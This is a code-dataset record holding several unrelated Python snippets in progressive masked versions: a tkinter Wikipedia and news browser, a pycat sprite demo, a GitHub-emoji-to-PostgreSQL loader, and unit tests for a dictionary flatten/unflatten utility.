category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\nif __name__ == '__main__':\n main_window = MainWindow()\n",
"step-5": "\"\"\"main.py\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom ttkthemes import ThemedStyle\nimport wikipedia as wk\nfrom newsapi import NewsApiClient as nac\nimport datetime\nimport random\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n \n def __init__(self):\n self.p = None\n \n self.main_page = tk.Tk()\n self.main_page.title(\"MetaWikipedia\")\n self.main_page.geometry(\"500x500\")\n\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme(\"scidblue\")\n\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n\n # Left pane\n self.search = ttk.Button(self.left_pane, text=\"Search\", command=self.search_wikipedia)\n self.search.place(relx=0,rely=0,relheight=0.1,relwidth=0.5)\n\n self.randomize_but = ttk.Button(self.left_pane, text=\"Randomize\", command=self.randomize)\n self.randomize_but.place(relx=0.5,rely=0,relheight=0.1,relwidth=0.5)\n\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0,rely=0.1,relheight=0.1,relwidth=1)\n\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0,rely=0.2,relheight=0.4,relwidth=1)\n\n extra_list_choices = [\"none\", \"categories\", \"pageid\", \"sections\", \"html\"]\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set(\"none\")\n self.extra_list = ttk.OptionMenu(\n self.left_pane,\n self.extra_list_choice,\n *extra_list_choices,\n command=self.update_choice\n )\n self.extra_list.place(relx=0,rely=.6,relheight=.1,relwidth=1)\n\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0,rely=0.7,relheight=.3,relwidth=1)\n\n\n # Right pane\n self.api_key_label = ttk.Label(self.right_pane, text=\"API Key\")\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=.4)\n\n self.api_key_entry = ttk.Entry(self.right_pane, text=\"ABC...\")\n self.api_key_entry.place(relx=.4, rely=0, relheight=0.1, relwidth=.6)\n\n self.news_box = 
tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=.1, relheight=.5, relwidth=1)\n\n self.top_categories_label = ttk.Label(self.right_pane, text=\"Top Categories\")\n self.top_categories_label.place(relx=0,rely=0.6,relheight=0.1,relwidth=1)\n\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0,rely=0.7,relheight=0.3,relwidth=1)\n\n self.category_map = {}\n\n self.randomize()\n \n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0',tk.END).replace(\"\\n\",\"\"))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state=\"normal\")\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state=\"disabled\")\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == \"none\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', \"\")\n if value == \"categories\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == \"pageid\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == \"sections\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == \"html\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n 
self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in [\"wiki\", \"sources\", \"article\", \"stub\",\n \"wayback\", \"cs1\"]:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = \"\"\n for cat in cats:\n hit = \"hits\" if self.category_map[cat] > 1 else \"hit\"\n display += f\"{cat}, {self.category_map[cat]} {hit}\\n\"\n self.top_categories.configure(state=\"normal\")\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state=\"disabled\")\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == \"\":\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = (now-datetime.timedelta(days=14))\n #today = now.strftime()\n query = \"\"\n for cat in self.sorted_categories():\n query += f\"{cat},\"\n search = api.get_top_headlines(q=query,\n sources=\"bbc-news,the-verge\",\n language=\"en\")\n news = \"\"\n for article in search[\"articles\"]:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n\nif __name__ == \"__main__\":\n main_window = MainWindow()\n",
"step-ids": [
8,
9,
11,
12,
13
]
}
|
[
8,
9,
11,
12,
13
] |
from pycat.base.color import Color
from pycat.sprite import Sprite
from pycat.window import Window
from pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV
from random import randint
# Single application window; every sprite below is created on it.
window=Window()
class Chick(Sprite):
    """A chick sprite placed at a random position with a random heading."""

    def on_create(self):
        """Set appearance and placement when the sprite is spawned."""
        self.image = 'chick-a.png'
        self.scale = 1
        self.rotation = randint(0, 360)
        # NOTE(review): 500 exceeds the usual 0-255 opacity range —
        # presumably clamped by pycat; confirm the intended value.
        self.opacity = 500
        self.goto_random_position()
# Populate the window with a crowd of translucent red chicks, then start
# the event loop (blocks until the window closes).
for _ in range(1000):
    sprite = window.create_sprite(Chick)
    sprite.opacity = 200
    sprite.scale = 2
    sprite.color = Color.RED

window.run()
|
normal
|
{
"blob_id": "cc7942c406e9bcb5af43f131fdf0a6441f81c16a",
"index": 4260,
"step-1": "<mask token>\n\n\nclass Chick(Sprite):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-3": "<mask token>\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-4": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-5": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow=Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\n# c1 = window.create_sprite(Chick)\n# c2 = window.create_sprite(Chick)\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\n\nwindow.run()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get('https://api.github.com/emojis')
response = json.loads(response.text)
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
<|reserved_special_token_1|>
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get('https://api.github.com/emojis')
response = json.loads(response.text)
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
<|reserved_special_token_1|>
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get("https://api.github.com/emojis")
response = json.loads(response.text)
for key,value in response.items():
Emoji = Emojis(name=key, url = value)
session.add(Emoji)
session.commit()
|
flexible
|
{
"blob_id": "0aa95b6a72472e8e260c07f4c42a327384ca0da4",
"index": 9173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-3": "<mask token>\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-4": "from Psql_Database_Setup import *\nimport requests, json\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-5": "from Psql_Database_Setup import *\r\nimport requests, json\r\n\r\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\r\nBase.metadata.bind = engine\r\n\r\nDBSession = sessionmaker(bind=engine)\r\nsession = DBSession()\r\n\r\nresponse = requests.get(\"https://api.github.com/emojis\")\r\nresponse = json.loads(response.text)\r\n\r\nfor key,value in response.items():\r\n Emoji = Emojis(name=key, url = value)\r\n session.add(Emoji)\r\n session.commit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
import unittest
from unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split
from unflatten import _recognize_lists
from unflatten import _tree_to_path_tuples_with_values
from unflatten import brackets_join
from unflatten import flatten
from unflatten import unflatten
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
import unittest
from unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split
from unflatten import _recognize_lists
from unflatten import _tree_to_path_tuples_with_values
from unflatten import brackets_join
from unflatten import flatten
from unflatten import unflatten
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(
list(_tree_to_path_tuples_with_values(
{'a': ['b',
{'e': 1}]})),
[(('a', 0), 'b'),
(('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
_path_tuples_with_values_to_dict_tree(
[(('a', 0), 'b'),
(('a', 1, 'e'), 1)]),
{'a': {0: 'b',
1: {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(
_recognize_lists(
{0: 'a',
1: {'b': -1,
'c': {0: 'd',
1: -2}}}),
['a',
{'b': -1,
'c': ['d',
-2]}])
def test_again(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b': {0: 'c',
1: {0: 'd',
1: {'e': {'f': -1,
'g': 'h'}}}}}),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
flatten(
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]}),
{'a': 1,
'b[0]': 'c',
'b[1][0]': 'd',
'b[1][1][e][f]': -1,
'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(
flatten(
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]},
join=dot_colon_join),
{'a': 1,
'b:0': 'c',
'b:1:0': 'd',
'b:1:1.e.f': -1,
'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b[0]': 'c',
'b[1][0]': 'd',
'b[1][1][e][f]': -1,
'b[1][1][e][g]': 'h'}),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b:0': 'c',
'b:1:0': 'd',
'b:1:1.e.f': -1,
'b:1:1.e.g': 'h'},
split=dot_colon_split),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
|
flexible
|
{
"blob_id": "5119b1b6817e002c870b4d6a19fe9aee661fff7e",
"index": 8425,
"step-1": "<mask token>\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 